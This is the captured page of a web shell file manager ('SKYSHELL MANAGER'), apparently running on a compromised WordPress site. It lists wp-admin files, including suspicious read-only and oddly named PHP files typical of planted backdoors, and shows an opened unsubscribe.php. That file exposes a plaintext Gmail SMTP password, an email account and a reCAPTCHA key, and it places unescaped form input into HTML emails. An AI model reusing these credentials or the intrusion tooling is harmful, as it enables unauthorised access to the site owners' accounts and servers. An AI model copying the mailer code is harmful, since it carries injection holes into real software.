📁
SKYSHELL MANAGER
PHP v8.1.29
Create
Create
Path:
root
/
var
/
www
/
html
/
wxwpsite
/
fungiftdeals
/
wp-admin
/
Name
Size
Perm
Actions
📁
css
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
includes
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
maint
-
0755
🗑️
🏷️
🔒
📁
network
-
0755
🗑️
🏷️
🔒
📁
user
-
0755
🗑️
🏷️
🔒
📄
about.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
admin-footer.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
12.63 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
async-upload.php
5.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
authorize-application.php
10.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
comment.php
11.37 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
custom-header.php
0.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
customize.php
11.21 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit-form-blocks.php
14.73 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
edit.php
19.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
export-personal-data.php
7.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
font-library.php
1.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
home.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
7.68 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
media-upload.php
3.58 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
menu-header.php
9.82 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
network.php
5.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
press-this.php
2.41 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
privacy.php
2.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
setup-config.php
17.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
themes.phpwp-update.php
114.83 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
update.php
12.76 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
user-edit.php
40.35 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
widgets-form-blocks.php
5.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: unsubscribe.php
<!-- Author: W3layouts Author URL: http://w3layouts.com License: Creative Commons Attribution 3.0 Unported License URL: http://creativecommons.org/licenses/by/3.0/ --> <!DOCTYPE html> <html> <head> <title>globemagazines</title> <link rel="shortcut icon" href="images/fav.ico"> <!-- Custom Theme files --> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <style> #g-recaptcha-response { display: block !important; position: absolute; margin: -78px 0 0 0 !important; width: 302px !important; height: 76px !important; z-index: -999999; opacity: 0; } </style> <script> window.addEventListener('load', () => { const $recaptcha = document.querySelector('#g-recaptcha-response'); if ($recaptcha) { $recaptcha.setAttribute('required', 'required'); } }) </script> <script src="https://www.google.com/recaptcha/api.js" async defer></script> <!-- //Custom Theme files --> <style type="text/css"> <!-- Responsive Styles and Valid Styles --> body{ width: 100%; margin:0; padding:0; -webkit-font-smoothing: antialiased; } p,h1,h2,h3,h4{ margin-top:0; margin-bottom:0; padding-top:0; padding-bottom:0; } html{ width: 100%; } a { color: #0091e6; text-decoration: none; } table{ font-size: 14px; border: 0; } .iebg { background: #ffffff; } /*.menulink a { color: #414a51 !important; text-decoration:none;}*/ /* ----------- responsivity ----------- */ @media only screen and (max-width: 640px){ /*------ top header ------ */ .header-bg{width: 440px !important; height: 10px !important;} table[class="table-full"] { width: 100% !important; text-align: center !important; } table.feature { text-align:center; width: 100%; } td[class="hide"] { max-height: 0px !important; height: 0px !important; } .main-header{line-height: 28px !important;} .main-subheader{line-height: 28px !important;} .container,table.table-inner{width: 440px !important;} .container-middle{width: 420px !important;} .mainContent{width: 400px !important;} .main-image{width: 400px !important; height: auto !important;} .banner{width: 400px !important; height: auto !important;} /*------ sections ---------*/ .section-item{width: 400px !important;} .section-img{width: 400px !important; height: auto !important;} /*------- prefooter ------*/ .prefooter-header{padding: 0 10px !important; line-height: 24px !important;} .prefooter-subheader{padding: 0 10px !important; line-height: 24px !important;} /*------- footer ------*/ .top-bottom-bg{width: 420px !important; height: auto !important;} img.app-store { width: 35%!important; margin-left:0!important;} img.google-store { width: 35%!important; margin-left:0!important;} } @media only screen and (max-width: 479px){ /*------ top header ------ */ .header-bg{width: 280px !important; height: 10px !important;} .top-header-left{width: 260px !important; text-align: center !important;} .top-header-right{width: 260px !important;} .main-header{line-height: 28px !important; text-align: center !important;} .main-subheader{line-height: 28px !important; text-align: center !important;} /*------- header ----------*/ .logo{width: 260px !important;} .nav{width: 260px !important;} .container,table.table-inner{width: 280px !important;} .container-middle{width: 260px !important;} .mainContent{width: 240px !important;} .main-image{width: 260px !important; height: auto !important;} .banner{width: 240px !important; height: auto !important;} /*------ sections ---------*/ .section-item{width: 240px !important;} .section-img{width: 240px !important; height: auto !important;} /*------- prefooter ------*/ .prefooter-header{padding: 0 10px !important;line-height: 28px !important;} .prefooter-subheader{padding: 0 10px !important; line-height: 28px !important;} /*------- footer ------*/ .top-bottom-bg{width: 260px !important; height: auto !important;} img.app-store { width: 50%!important; margin-left:0!important;} img.google-store { width: 50%!important; margin-left:0!important;} } @media only screen and (max-width: 414px){ .container,table.table-inner{width: 350px !important;} } @media only screen and (max-width: 384px){ .container,table.table-inner{width: 330px !important;} } @media only screen and (max-width: 375px){ .container,table.table-inner{width: 300px !important;} } @media only screen and (max-width: 320px){ .container,table.table-inner{width: 280px !important;} } @media only screen and (max-width: 991px){ td.banner-top-wthree { height: 45px!important; } td.banner-text-agileits { font-size: 20px!important; } td.banner-btm-agileits-w3layouts { height: 58px!important; } td.banner-btm-w3-agile { height: 70px!important; } } @media only screen and (max-width: 768px){ td.banner-img-w3ls img { width: 200px!important; } td.banner-text-agileits { font-size: 18px!important; } a.button-agile { padding: 13px 35px!important; font-size: 12px!important; } td.service-w3 { height: 23px!important; } td.services-agileits { height: 0px!important; } } @media only screen and (max-width: 667px){ td.banner-top-wthree { height: 25px!important; } td.banner-top-agileinfo-w3layouts { height: 0px!important; } td.offer-w3ls { font-size: 17px!important; } td.offer-w3l { height: 110px!important; } td.heading { font-size: 2.15em!important; } } @media only screen and (max-width: 640px){ table { width: 96%!important; } td.banner-img-w3ls img { width: 185px!important; } table.banner-image-w3l { width: 100%!important; } td.scale-center-both { text-align: center!important; } table.footer { width: 96%!important; } table.services { width: 100%!important; } table.price-table-w3ls { width: 100%!important; } td.top_font { text-align: center!important; } td.places-head-agileits{ text-align: center!important; align:initial!important; } table.icon-img { width: 100%!important; display: block!important; margin: 0 auto!important; } table.ser_grid { text-align: center!important; width: 100%!important; } td.places-top-w3ls { height: 15px!important; } td.places-btm-w3-agile { height: 5px!important; } td.m-hei { height: 25px!important; } table.icons { width: 20%!important; } img.social-img-w3l { width: 112px!important; } .social-top{ height:0px!important; } table.preferencelink { text-align: center!important; } td.footer-padw3-agile { height: 3px!important; } .banner-offer-w3l{ width:295px!important; } table.bar { width: 7%!important; } table.table600 { width: 86%!important; } table.icons { margin-top: 1em; } table.icon-img { margin: 10px auto!important; } } @media only screen and (max-width: 568px){ td.banner-text-agileits { font-size: 15px!important; } td.banner-btm-agileits-w3layouts { height: 43px!important; } td.banner-btm-w3-agile { height: 49px!important; } td.top-agileits { height: 40px!important; } td.bottom-w3layouts { height: 27px!important; } td.sub-btm { height: 7px!important; } td.footer-link { font-size: 13.5px!important; } a.button-agile { padding: 12px 30px!important; } td.top_font { font-size: 1.17em!important; } td.service-w3 { height: 0px!important; } td.price-btm { height: 24px!important; } td.price-last { height: 54px!important; } } @media only screen and (max-width: 480px){ td.banner-img-w3ls img { width: 165px!important; } td.banner-top-wthree { height: 0px!important; } table.services { width: 99%!important; } td.top-agileits { height: 32px!important; } td.bottom-w3layouts { height: 25px!important; } td.price-top-w3-agile { height: 15px!important; } td.price-btm-w3-agile { height: 10px!important; } } @media only screen and (max-width: 414px){ td.banner-text-agileits { font-size: 13px!important; letter-spacing: 3px!important; word-spacing: 0px!important; } table.bar { width: 10%!important; } } @media only screen and (max-width: 384px){ td.offer-w3ls { font-size: 16px!important; letter-spacing: 4px; } td.heading { font-size: 2em!important; } table.table-inner img { width: 100px!important; } td.places-img img { width: 200px!important; height: 200px!important; } } @media only screen and (max-width: 375px){ a.button-agile { padding: 13px 35px!important; font-size: 11px!important; } td.lets { height: 26px!important; } td.banner-img-w3ls img { width: 160px!important; } } @media only screen and (max-width: 320px){ table.bar { width: 14%!important; } td.sub-head-w3 { letter-spacing: 1.5px!important; font-size: 11px!important; } } /* ----------- responsivity ----------- */ /* Reset */ * { margin-top: 0px; margin-bottom: 0px; padding: 0px; border: none; line-height: normal; outline: none; list-style: none; -webkit-text-size-adjust: none; -ms-text-size-adjust: none; } table { border-collapse: collapse !important; padding: 0px !important; border: none !important; border-bottom-width: 0px !important; mso-table-lspace: 0pt; mso-table-rspace: 0pt; } table td { border-collapse: collapse; } body { margin: 0px; padding: 0px; } .ExternalClass * { line-height: 100%; } ::selection { background: #506daa; color: #FFFFFF; } ::-moz-selection { background: #506daa; color: #FFFFFF; } /* Responsive */ @media only screen and (max-width:630px) { /* Tables parameters: width, alignment, padding */ table[class=scale] { width: 100%!important; } table[class=scale90] { width: 90%!important; } table[class=scale85] { width: 85%!important; } table[class=scale80] { width: 80%!important; } table[class=scale75] { width: 55%!important; } table[class=scale-reset] { width: 100%!important; height: auto!important; } /* Td */ td[class=scale-left] { width: 100%!important; text-align: left!important;} td[class=scale-left-bottom] { width: 100%!important; text-align: left!important; padding-bottom: 25px!important; } td[class=scale-left-top] { width: 100%!important; text-align: left!important; padding-top: 25px!important; } td[class=scale-left-all] { width: 100%!important; text-align: left!important; padding-top: 25px!important; padding-bottom: 25px!important; } td[class=scale-center] { width: 100%!important; text-align: center!important;} td[class=scale-center-both] { width: 100%!important; text-align: center!important; padding-left: 20px!important; padding-right: 20px!important; } td[class=scale-center-both-top] { width: 100%!important; text-align: center!important; padding-left: 20px!important; padding-right: 20px!important; padding-top: 25px!important; } td[class=scale-center-bottom] { width: 100%!important; text-align: center!important; padding-bottom: 25px!important; } td[class=scale-center-top] { width: 100%!important; text-align: center!important; padding-top: 25px!important; } td[class=scale-center-all] { width: 100%!important; text-align: center!important; padding-top: 25px!important; padding-bottom: 25px!important; padding-left: 20px!important; padding-right: 20px!important; } td[class=scale-center-extraall] { width: 100%!important; text-align: center!important; padding-top: 54px!important; padding-bottom: 25px!important; } td[class=scale-right] { width: 100%!important; text-align: right!important;} td[class=scale-right-bottom] { width: 100%!important; text-align: right!important; padding-bottom: 25px!important; } td[class=scale-right-top] { width: 100%!important; text-align: right!important; padding-top: 25px!important; } td[class=scale-right-all] { width: 100%!important; text-align: right!important; padding-top: 25px!important; padding-bottom: 25px!important; } td[class=scale-center-extratop] { width: 100%!important; text-align: center!important; padding-top: 60px!important; } td[class=reset] { height: 0px!important; } td[class=hide] { height: 0px!important; display: none!important; } /* Other */ p[class=reset] { margin-left: 0px!important; margin-right: 0px!important; } p[class=reset-top] { margin-top: 0px!important; } img[class="reset"] { display: inline!important; } img[class="scale-img"] { width: 100%!important; } } input[type=text], select, textarea { width: 100%; padding: 12px; border: 1px solid #ccc; border-radius: 4px; box-sizing: border-box; margin-top: 6px; margin-bottom: 16px; resize: vertical; } .email { width: 100%; padding: 12px; border: 1px solid #ccc; border-radius: 4px; box-sizing: border-box; margin-top: 6px; margin-bottom: 16px; resize: vertical; } input[type=submit] { background-color: #01b5dd; color: #FFFFFF; padding: 15px 45px; border-radius: 5px; text-decoration: none; font-family: 'Open Sans', Arial, sans-serif; font-weight: bold; letter-spacing: .2px;text-transform: uppercase; font-size: 14px } .container { border-radius: 5px; background-color: #f2f2f2; padding: 20px; } .email1 { padding: 15px 45px; border: 1px solid #ccc; border-radius: 4px; box-sizing: border-box; margin-top: 6px; margin-bottom: 16px; resize: vertical; } </style> </head> <body style="margin-top: 0; "> <!-- HEADER --> <repeater><table class="banner-image-w3l" width="100%" border="0" cellspacing="0" cellpadding="0" align="center" style="background: url(images/banner2.jpg) center center / cover no-repeat;min-height: 890px;"> <tr> <td style="background-color: rgba(10, 10, 10, 0.46);"> <table width="620" border="0" cellspacing="0" cellpadding="0" align="center" class="scale"> <tr> <td align="center"> <table width="560" border="0" cellspacing="0" cellpadding="0" align="center" class="scale"> <tr><td class="banner-top-wthree" height="90"> </td></tr> <tr> <td class="banner-img-w3ls" style="font-family: Helvetica, Arial, sans-serif; font-size: 14px; color: #9b9b9b;" align="center" class="scale-center"> <a href="index.php"><img src="images/logo2.png" border="0" alt="" width="600" height="260" editable="true" /></a> </td> </tr> <tr><td class="banner-top-agileinfo-w3layouts" height="30"> </td></tr> <tr> <td class="banner-text-agileits" style="text-align: center; color: #fff; font-size: 22px; letter-spacing: 5px; word-spacing: 1px; font-family: source_sans_probold, Helvetica, Arial, sans-serif; text-transform: uppercase;">subscribe our newsletter</td> </tr> <tr><td class="banner-btm-agileits-w3layouts" height="75"> </td></tr> <tr> <td> <table align="center"> <tr> <td align="center"> <form action="#"> <input class="email1" type="email" id="lname" name="lastname" placeholder="Enter your email"> <input type="submit" value="SUBSCRIBE"> </form> </td> </tr> </table> </td> </tr> <tr><td class="banner-btm-w3-agile"height="90"> </td></tr> </table> </td> </tr> </table> </td> </tr> </table></repeater> <!--// HEADER --> <table width="100%" border="0" cellspacing="0" cellpadding="0" align="center" bgcolor="fafafa" > <tr> <td width="100%" align="center" valign="top" bgcolor="f2f2f2" style=""> <!-- main content --> <table class="popular" style="box-shadow: 0px 0px 0px #CAC9C9;"width="620" border="0" cellpadding="0" cellspacing="0" align="center" class="container top-header-left"> <tbody> <!-- padding --> <tr> <td class="top-agileits" height="50"></td> </tr> <!-- //padding --> <tr> <td class="heading" style="text-align:center;color: #000;font-size: 2.3em;font-family:Candara;font-weight:600;">UNSUBSCRIBE</td> </tr> <tr><td class="bottom-w3layouts" height="35"></td></tr> <tr><td> <form method="post" action="unsubscribe.php"> <label for="lname">Email</label> <input class="email" type="email" id="lname" name="email" placeholder="Your email"> <label for="subject">Feedback</label> <textarea id="subject" name="message" placeholder="Write something.." style="height:200px"></textarea> <div class="g-recaptcha" data-sitekey="6Lfb8P4lAAAAAH9h66bp8B6CGzZgfDpnrFSkGmGs"></div> <br/> <input type="submit" name="Submit" value="Unsubscribe us"> </form> <?php use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\SMTP; use PHPMailer\PHPMailer\Exception; //require_once __DIR__ . '/vendor/phpmailer/src/Exception.php'; require_once __DIR__ . '/vendor/phpmailer/src/PHPMailer.php'; require_once __DIR__ . '/vendor/phpmailer/src/SMTP.php'; //subscribe form if (isset($_POST['Submit'])){ $name=$_REQUEST['name']; $email=$_REQUEST['email']; $message=$_REQUEST['message']; if (($email=="")||($email=="")) { echo "All fields are required, please fill the form again."; } else{ $mail = new PHPMailer(true); // Server settings //$mail->SMTPDebug = SMTP::DEBUG_SERVER; // for detailed debug output $mail->isSMTP(); $mail->Host = 'smtp.gmail.com'; $mail->SMTPAuth = true; $mail->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS; $mail->Port = 587; $mail->Username = 'contact@globemagazines.com'; // YOUR gmail email $mail->Password = 'jhjjbndptqzfoyvq'; // YOUR gmail password // Sender and recipient settings $mail->setFrom('contact@globemagazines.com', 'Globe Magazines'); $mail->addAddress($email, $name, $message); $mail->addReplyTo('contact@globemagazines.com', 'Globe Magazines'); // to set the reply to // Setting the email content $mail->IsHTML(true); $mail->Subject = "Unsubscribe Replay [Success]"; $mail->Body = "<h2>Thank you for Unsubscribe us.</h2> <p>This message confirms that you have unsubscribed from the globemagazines.</p>"; $mail->AltBody = "This is the plain text version of the email content"; if(!$mail->send()) { echo "Success! check sometimes later."; } else { echo "Success! check your email."; } $mail2 = new PHPMailer(true); // Server settings //$mail2->SMTPDebug = SMTP::DEBUG_SERVER; // for detailed debug output $mail2->isSMTP(); $mail2->Host = 'smtp.gmail.com'; $mail2->SMTPAuth = true; $mail2->SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS; $mail2->Port = 587; $mail2->Username = 'contact@globemagazines.com'; // YOUR gmail email $mail2->Password = 'jhjjbndptqzfoyvq'; // YOUR gmail password // Sender and recipient settings $mail2->setFrom('contact@globemagazines.com', 'Globe Magazines'); $mail2->addAddress('contact@globemagazines.com', 'Globe Magazines'); //$mail->addReplyTo('contact@globemagazines.com', 'Globe Magazines'); // to set the reply to // Setting the email content $mail2->IsHTML(true); $mail2->Subject = "Unsubscribe Details"; $mail2->Body = "<strong>Following user has been submitted Unsubscribe details on your website <strong><br> Name : $name<br> Email : $email<br> Message : $message<br>"; //$mail->AltBody = "This is the plain text version of the email content"; $mail2->send(); } } ?> </td></tr> <!-- padding --> <tr> <td class="top_bot_pad" height="70"></td> </tr> <!-- //padding --> </tbody> </table> </td> </tr> </table> <!--cta--> <layout label="CTA"> <table bgcolor="#212121" align="center" width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center"> <table class="table-inner" width="620" border="0" cellspacing="0" cellpadding="0"> <tr> <td height="30"></td> </tr> <!--logo--> <tr> <td align="center" style="line-height: 0px;"> <a href="index.php"><img editable lebel="logo" style="display:block; line-height:0px; font-size:0px; border:0px;" src="images/logo2.png" width="300" alt="img"/></a> </td> </tr> <!--end logo--> <tr> <td height="15"></td> </tr> <!--content--> <tr> <td align="center" style="color: #fff; font-family: Candara; font-size: 1.1em; line-height: 28px;"> Simply Contact Our Team And Get It Done </td> </tr> <!--end content--> <tr> <td class="lets" height="35"></td> </tr> <!--button--> <tr> <td align="center"> <table border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td class="menulink" height="40" align="center" > <a href="contact.php" class="button-agile" style="background-color: #fff; border:2px solid #01b5dd; color: #202020; padding: 15px 45px; border-radius: 5px; text-decoration: none; font-family: 'Open Sans', Arial, sans-serif;font-weight: bold;letter-spacing: .2px;text-transform: uppercase; font-size: 14px;"> Contact us </a> </td> </tr> </table> </td> </tr> <!--end button--> </table> </td> </tr> </table> </layout> <!--end cta--> <!-- Footer --> <table class="footer" bgcolor="#212121" width="100%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td height="30"></td> </tr> <tr> <td align="center" bgcolor="#212121" style="border-top:5px solid #333;"> <table class="table600" width="600" border="0" align="center" cellpadding="0" cellspacing="0" style="margin-left:20px; margin-right:20px;"> <tr> <td height="15"></td> </tr> <tr> <td> <!--copyright--> <table class="table-full" align="left" border="0" cellspacing="0" cellpadding="0"> <tr> <td class="footer-link" style="font-family: Candara; color:#fff; font-size:14px; letter-spacing: .5px; line-height: 28px;"> © 2023 globemagazines.com. All Rights Reserved </td> </tr> </table> <!--end copyright--> <!--Space--> <table width="1" border="0" cellpadding="0" cellspacing="0" align="left"> <tr> <td class="footer-padw3-agile" height="30" style="font-size: 0;line-height: 0px;border-collapse: collapse;"> <p style="padding-left:24px;"> </p> </td> </tr> </table> <!--End Space--> <!--preference--> <table class="preferencelink" border="0" align="right" cellpadding="0" cellspacing="0"> <tr> <td class="footer-link" style="font-family: Candara; color:#fff; font-size:14px; letter-spacing: .5px; line-height: 28px;"> <a href="privacy.php" style="color:#ffffff;text-decoration:none;">Privacy</a> / <a href="terms.php" style="color:#ffffff;text-decoration:none;">Terms of Use</a> / <a href="unsubscribe.php" style="color:#ffffff;text-decoration:none;">Unsubscribe</a> </td> </tr> </table> <!--end preference--> </td> </tr> <tr> <td height="10"></td> </tr> </table> </td> </tr> </table> <!-- end Footer --> </body> </html>
Save